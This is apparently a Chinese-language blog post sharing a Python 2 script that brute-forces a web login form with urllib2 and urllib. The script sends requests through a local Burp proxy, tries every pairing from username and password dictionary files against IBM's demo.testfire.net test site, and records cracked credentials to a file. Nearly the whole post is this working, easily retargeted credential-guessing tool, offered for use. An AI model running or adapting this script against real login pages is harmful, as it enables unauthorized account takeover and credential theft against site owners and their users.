使用 python 的 urllib2和 urllib模塊爆破 form 表單的簡易腳本

時間 2019-12-05

標籤使用 python urllib2 urllib 模塊爆破 form 表單簡易腳本欄目 Python 简体版

原文原文鏈接

python 的 http 中 urllib2和 urllib模塊在web 表單爆破的使用方法python
腳本中還增長了 urllib2和 urllib模塊如何添加代理的方法web

# -*- coding: utf-8 -*-
import urllib2
import urllib
import time


def brute_force(user, password):
    #strip() 方法用於移除字符串頭尾指定的字符（默認爲空格）
    name = user.strip()
    passwd = password.strip()

    #添加代理:本地8080端口的代理是 burp 工具,主要是查看腳本發包回包的狀況,好定位問題
    
    proxy = urllib2.ProxyHandler({"http":'http://127.0.0.1:8080'})
    opener = urllib2.build_opener(proxy)
    urllib2.install_opener(opener)

    #IBM 公司的一個 測試網站
    url1 = "http://demo.testfire.net/bank/login.aspx"
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
    headers = {"User-Agent":user_agent,"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://demo.testfire.net/bank/login.aspx"}
    values = {'uid': name, 'passw': passwd,'btnSubmit':'Login'}
    data = urllib.urlencode(values)#能夠把key-value這樣的鍵值對轉換成咱們想要的格式，返回的是a=1&b=2這樣的字符串
    request = urllib2.Request(url1,data,headers)
    response = urllib2.urlopen(request)
    url2 = response.geturl()
    time.sleep(3)


    if url2 != url1:
        #由於urllib2 返回的頁面若是存在302重定向,返回的頁面是重定向以後的頁面,因此不能以302狀態碼來判斷是否登陸成功,
        #由於重定向以後的頁面訪問成功是200,不是302;因此以返回的頁面是否是發生變化來判斷是不是否登陸成功。

        print '---- find user:', name, ' with password:',passwd, '-----'
        print url2
        outFile.write(name + ':' + passwd+'\n' )
    else:
        print '----- error user:', name, ' with password:',passwd, '-----'
        print url2
    response.close()
    return



outFile = open('accounts-cracked.txt', 'w')

if __name__ == '__main__':
    #導入用戶名字典
    with open('user.dic', 'r') as userline:
        y = userline.readlines()
        #導入密碼的字典
        with open('pass.dic', 'r') as passline:
            b= passline.readlines()
            for u in y:
                for p in b:
                    brute_force(user=u,password=p)
                    
outFile.close()
with open('accounts-cracked.txt','r') as text:
    list = text.readlines()
    sum=len(list)

if sum>0:
    print "找到",sum,"個帳號密碼"
else:
    print "All thread OK,maybe not "

輸入有點醜,將就用下
app